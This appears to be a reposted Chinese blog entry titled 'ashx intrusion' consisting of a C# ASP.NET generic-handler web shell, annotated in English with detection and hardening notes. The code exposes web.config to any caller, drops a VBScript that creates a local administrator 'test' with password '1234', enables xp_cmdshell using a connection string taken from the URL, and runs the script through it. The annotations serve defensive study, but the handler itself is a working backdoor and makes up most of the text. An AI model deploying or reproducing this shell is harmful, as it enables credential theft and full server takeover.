  • ashx入侵

    <%@ WebHandler Language="C#" Class="TextLd" %>
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Web;
    using System.Data.SqlClient;

    // Analyst annotation: this generic handler (.ashx) is a web shell sample. Nothing in
    // the class checks who is calling it; every action is selected by query-string values.
    // What the visible code does, per request:
    //   - returns the application's web.config in the response body,
    //   - can drop a VBScript file (1.vbs) into the application root,
    //   - can run SQL on any server named by a caller-supplied connection string,
    //     including turning on xp_cmdshell and using it to launch cscript on the dropped file.
    // Detection ideas for defenders: new or modified .ashx files under a web root; the IIS
    // worker process (w3wp.exe) writing .vbs files; sqlservr.exe spawning cmd.exe/cscript.exe;
    // sp_configure changes to 'xp_cmdshell'; Windows Security events 4720 (account created)
    // and 4732 (member added to a local group) for unexpected accounts.
    // Hardening that blunts it: no write ACL on web content for the app-pool identity, an
    // application SQL login without sysadmin/ALTER SETTINGS, xp_cmdshell left disabled,
    // and an encrypted connectionStrings section in web.config.
    public class TextLd : IHttpHandler
    {
    /// <summary>
    /// Starts d:1.vbs via Process.Start and then writes VBScript text to the same path.
    /// The script text references the local Administrators group, a user named "test" and
    /// the password "1234"; it appears intended to create a local administrator account.
    /// </summary>
    /// <param name="newPath">Not used by the body.</param>
    // NOTE(review): no call to this method is visible in ProcessRequest.
    public void CreateLocalUser(string newPath)
    {
    System.Diagnostics.Process.Start(@"d:1.vbs");
    System.IO.File.WriteAllText(@"d:1.vbs", "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    /// <summary>
    /// Writes the full text of the application's root web.config to the HTTP response.
    /// </summary>
    /// <param name="context">Current request context; supplies MapPath and the response.</param>
    // web.config typically holds connection strings and other secrets, so any handler
    // echoing it is a credential-disclosure indicator.
    public void ShowWebConfig(HttpContext context)
    {
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    }
    /// <summary>
    /// Writes the same VBScript text as CreateLocalUser into 1.vbs under the application root.
    /// </summary>
    /// <param name="context">Current request context; used only to resolve "~/1.vbs".</param>
    // Succeeds only if the worker-process identity can write to the site directory;
    // a script file appearing in a web root is a file-integrity-monitoring signal.
    public void WriteVbs(HttpContext context)
    {
    System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") '属性,admin组 od=ob.Create("user","test") '建立用户 SetPassword "1234" '设置密码 SetInfo of=GetObject(os&"/test",user) add os&"/test"");
    }
    /// <summary>
    /// Opens a SqlConnection with the given connection string and runs the given text
    /// with ExecuteNonQuery; no result is returned.
    /// </summary>
    /// <param name="connection">Connection string; ProcessRequest takes it from the query string.</param>
    /// <param name="sql">SQL text passed to SqlCommand unchanged.</param>
    public void ExecuteSql(string connection, string sql)
    {
    using (SqlConnection con = new SqlConnection(connection))
    {
    using (SqlCommand commd = new SqlCommand(sql, con))
    {
    con.Open();
    commd.ExecuteNonQuery();
    con.Close();
    }
    }
    }
    /// <summary>
    /// Handler entry point: always returns web.config, then dispatches on the "method"
    /// query-string value ("1", "2", "3", anything else).
    /// </summary>
    /// <param name="context">Current request context.</param>
    public void ProcessRequest(HttpContext context)
    {
    context.Response.ContentType = "text/plain";
    // web.config is written to the response on every request, before "method" is read.
    context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));
    try
    {
    // The connection string comes straight from the URL, so it will show up in IIS request logs.
    var connection = context.Request.QueryString["connection"];
    switch (context.Request.QueryString["method"])
    {
    // "1": drop 1.vbs into the application root.
    case "1": WriteVbs(context); break;
    // "2": change server configuration. sp_configure/RECONFIGURE need ALTER SETTINGS
    // (sysadmin or serveradmin), so a least-privilege application login fails here;
    // SQL Server records configuration-option changes in its error log.
    case "2":
    ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure");
    ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");// enable xp_cmdshell on the database server
    break;
    // "3": have SQL Server run cscript on the dropped file. The path is the web
    // server's MapPath result; the process is a child of sqlservr.exe.
    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");
    break;
    // Any other value: write web.config to the response a second time.
    default:
    ShowWebConfig(context);
    break;
    }
    }
    catch (Exception ex)
    {
    // Exception text is returned to the caller.
    context.Response.Write(ex.Message);
    }
    context.Response.End();
    }
    /// <summary>Always false: the handler instance is not reused across requests.</summary>
    public bool IsReusable
    {
    get
    {
    return false;
    }
    }
    }

  • 原文地址:https://www.cnblogs.com/a14907/p/5053530.html